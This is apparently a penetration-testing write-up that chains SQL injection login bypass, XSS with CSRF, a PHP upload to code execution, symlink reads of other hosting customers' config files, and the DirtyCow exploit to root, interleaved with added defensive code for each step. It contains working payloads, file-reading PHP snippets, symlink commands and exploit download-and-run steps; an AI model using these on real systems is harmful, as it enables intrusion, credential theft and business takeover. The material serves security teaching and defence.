A cocktail of Vulnerabilities

A journey from bypassing login panel to getting r00t level access on a server with potential business takeover

Classic SQLi to bypass authentication mechanism
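The login bypass at the start of the chain works because the credentials are concatenated into the SQL text. The following is an added example (not the assessed application's code) showing the vulnerable pattern beside the parameterized fix, using an in-memory SQLite table with constructed accounts; passwords are kept in clear here only to keep the example short.

```python
import sqlite3

# Constructed sample accounts for the demonstration; not data from the assessment.
SAMPLE_USERS = [
    ("admin", "S3cret!", "admin"),
    ("alice", "wonderland", "user"),
]


def build_db():
    """Create an in-memory user table populated with the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_concatenated(conn, username, password):
    """Vulnerable: the credentials are spliced into the SQL text, so a quote in
    the username closes the string literal and the rest of the input is parsed
    as SQL. Returns the matched (username, role) row, or None."""
    query = ("SELECT username, role FROM users "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(query).fetchone()


def login_parameterized(conn, username, password):
    """Hardened: the statement is compiled with placeholders and the credentials
    are bound as values, so they can never change the query's structure."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = build_db()
    probe = "admin' --"   # the classic comment-out of the password condition
    print("concatenated :", login_concatenated(db, probe, "wrong"))    # admin row
    print("parameterized:", login_parameterized(db, probe, "wrong"))   # None
```

The bound version treats the whole probe string as a username that does not exist, so the only way through is a correct username and password pair.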
Portal view with User Management Module
Create User function exhibiting 3 different roles
XSS payload to redirect to the CSRF page: <script>window.location.assign('http://vulnerabilities.in/Surprise');</script>
<iframe src="/csrf.html" width=0 height=0></iframe>
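The XSS + CSRF step abuses the Create User function because the form accepts a cross-site request and because profile text is rendered unencoded. The following is an added example (not the portal's code) of the two controls that close this: a session-bound anti-CSRF token checked in constant time, and output encoding of untrusted text. The role names and the dict-based session and user store are assumptions. Note the caveat: a stored XSS payload runs in the victim's origin and can read the token from the page, so the token alone does not stop the combined chain; the encoding fix is what removes the XSS half.

```python
import hmac
import html
import secrets

# Assumed names for the three roles the Create User function exposes.
ALLOWED_ROLES = ("user", "moderator", "admin")


def issue_csrf_token(session):
    """Mint an unguessable token, bind it to the server-side session and hand it
    to the form that renders the Create User page."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session, submitted):
    """Constant-time comparison of the submitted token with the session's copy."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def create_user(session, form, user_store):
    """State-changing handler: refuse the request unless it carries the
    session-bound token, then validate the role before writing."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return {"ok": False, "error": "csrf token missing or invalid"}
    role = form.get("role")
    if role not in ALLOWED_ROLES:
        return {"ok": False, "error": "unknown role"}
    username = form.get("username", "").strip()
    if not username:
        return {"ok": False, "error": "username required"}
    user_store[username] = role
    return {"ok": True, "user": username, "role": role}


def render_display_name(name):
    """Output-encode untrusted profile text so a stored payload is rendered as
    text instead of being executed by the browser."""
    return '<span class="name">%s</span>' % html.escape(name, quote=True)


if __name__ == "__main__":
    session, store = {}, {}
    token = issue_csrf_token(session)
    print(create_user(session, {"username": "attacker", "role": "admin"}, store))
    print(create_user(session, {"csrf_token": token, "username": "bob", "role": "user"}, store))
    print(render_display_name("<script>window.location.assign('http://vulnerabilities.in/Surprise');</script>"))
```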
Profile page with image upload functionality
https://example.com/uploads/images/test-userID.php
<?php echo phpinfo();?>
RCE — phpinfo() method execution on target server
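The image uploader accepted a .php file and the upload directory executed it, which is what turned a profile picture into RCE. The following is an added example (not the application's upload code) of server-side validation that would have rejected test-userID.php: an extension allowlist, a magic-byte check so the content must match the extension, a secondary scan for PHP open tags, and a server-chosen random filename. The signatures are the standard PNG, JPEG and GIF headers; the sample uploads in the usage section are constructed. The essential companion control, not shown in code, is that the upload directory must never be mapped to a script handler.

```python
import os
import secrets

# Leading bytes of the image types the profile uploader is meant to accept.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Secondary heuristic only: the primary control is that the upload directory
# is not executable by the web server.
PHP_MARKERS = (b"<?php", b"<?=")


def validate_image_upload(filename, data):
    """Return (accepted, detail). Accepted uploads report their canonical
    extension; rejected ones report the reason."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base:
        return False, "null byte in filename"
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()     # only the last extension counts
    if ext == "jpeg":
        ext = "jpg"
    if ext not in IMAGE_SIGNATURES:
        return False, "extension not allowed"
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in PHP_MARKERS):
        return False, "embedded PHP tag"
    return True, ext


def storage_name(ext):
    """Server-chosen name: random, single extension, nothing taken from the
    client, so a double extension like shell.php.png never reaches disk."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample uploads.
    print(validate_image_upload("test-userID.php", b"<?php echo phpinfo();?>"))
    print(validate_image_upload("shell.php.png", b"<?php echo phpinfo();?>"))
    ok, ext = validate_image_upload("avatar.png", b"\x89PNG\r\n\x1a\n" + bytes(16))
    print(ok, storage_name(ext))
```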
1. /etc/valiases
<?php
$dir = '/etc/valiases';
$files = scandir($dir);
print_r($files);
?>
Email forwarders are set here, which reveals the domain name aliases.
2. /etc/named.conf
<?php
$file = file_get_contents('/etc/named.conf');
preg_match_all("#named/(.*?)\.db#", $file, $r);
// Each zone appears twice (internal & external), so de-duplicate
$domains = array_unique($r[1]);
?>
Consists of zone entries for all the domains on that server.
3. http://viewdns.info/reverseip/?host=domain.com
ln -s /home/target/public_html/includes/config.php symlink.txt
ln -s / symroot
ln -s /home/example/public_html/domain1/wp-config.php symlink1.txt
ln -s /home/example/public_html/domain2/blogs/wp-config.php symlink2.txt
ln -s /home/example/public_html/domain3/boxedlayout/wp-config.php symlink3.txt
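The symlinks above only pay off on shared hosting where the web server follows links and can read other customers' files. The following is an added example (not a tool from the write-up) of the audit a hosting operator would run: walk each customer's tree without following links and flag every symlink whose resolved target lies outside that customer's home. The fixture it builds in a temporary directory is constructed to mirror the layout in the write-up (a link to another account's config.php and a link to /). On the server side this is usually enforced rather than audited, for example Apache's SymLinksIfOwnerMatch and per-account PHP processes, so one account's web server never holds another account's read permission.

```python
import os
import tempfile


def escaping_symlinks(home):
    """Walk one customer's tree without following links and return
    (link, raw target, resolved target) for every symlink whose resolved
    target lies outside that customer's home."""
    home = os.path.realpath(home)
    hits = []
    for dirpath, dirnames, filenames in os.walk(home, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)   # resolves even if the target is missing
            if os.path.commonpath([home, target]) != home:
                hits.append((path, os.readlink(path), target))
    return hits


def build_constructed_fixture():
    """Constructed layout: an 'example' account whose public_html holds links to
    another account's config file and to /, plus one benign link inside home."""
    root = tempfile.mkdtemp(prefix="symlink-audit-")
    home = os.path.join(root, "home", "example")
    pub = os.path.join(home, "public_html")
    os.makedirs(pub)
    with open(os.path.join(pub, "index.html"), "w") as fh:
        fh.write("<html></html>")
    os.symlink("/home/target/public_html/includes/config.php",
               os.path.join(pub, "symlink.txt"))
    os.symlink("/", os.path.join(pub, "symroot"))
    os.symlink(os.path.join(pub, "index.html"), os.path.join(pub, "inside.html"))
    return home


def audit_constructed_fixture():
    """Build the fixture and return the basenames of the offending links."""
    home = build_constructed_fixture()
    return sorted(os.path.basename(path) for path, _, _ in escaping_symlinks(home))


if __name__ == "__main__":
    for link, raw, resolved in escaping_symlinks(build_constructed_fixture()):
        print("%s -> %s (resolves to %s)" % (link, raw, resolved))
```

Dangling links are reported too, because realpath resolves the path textually when the target does not exist; that matters since a link planted before the target file is created is still a link.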
Wordpress configuration file revealing Database credentials
Example.com/Ciph3r00t/ConnectDB.php
Username: Ciph3r00t
Password: MD5Hash(password)=> 5f4dcc3b5aa765d61d8327deb882cf99
Network interfaces configuration
cat /etc/.my.cnf
[client]
user=ExampleUser
password="MyStrongestPassword-TmV%dc_nt2@UXufQ"
Dedicated domain control panel access
Reseller domain control panel access
THN Tweet on 21st Oct 2016 about DirtyCow Exploit
Download:
curl https://github.com/FireFart/dirtycow/blob/master/dirty.c
Compilation:
gcc -pthread dirty.c -o dirty -lcrypt
Execution:
chmod +x dirty
./dirty
su firefart
Downloading, compiling and executing exploit on target server
Escalating to the firefart user created by the DirtyCow exploit, which has r00t privileges
  • XSS + CSRF → Uploader restrictions bypass → Upload PHP code → Trigger RCE
  • XSS + CSRF → Upload rev shell → Reverse DNS + Symlink + Extract credentials from config files → Upload DBMS script and connect to Database → Backdoor CMS accounts
  • XSS + CSRF → Upload rev shell → Priv Escalation → r00t access
  • Port Scanning → Services mapping → Extracting cPanel credentials → Login to domain control panel → Switching to Reseller Account → Request for Domain Transfer → Business Takeover
Snap from the Assessment Report

Keep training and keep learning until you get it Right.

Thank you for taking time to read this.

  • Make sure all the stakeholders are informed about pentesting activities beforehand to avoid any damage.
  • Hosting, domain and other service providers may suspend the accounts if they suspect abuse (make sure they are aware that it is an authorized activity).
  • Suspension of accounts results in business downtime for hours on end (monetary and reputational loss).
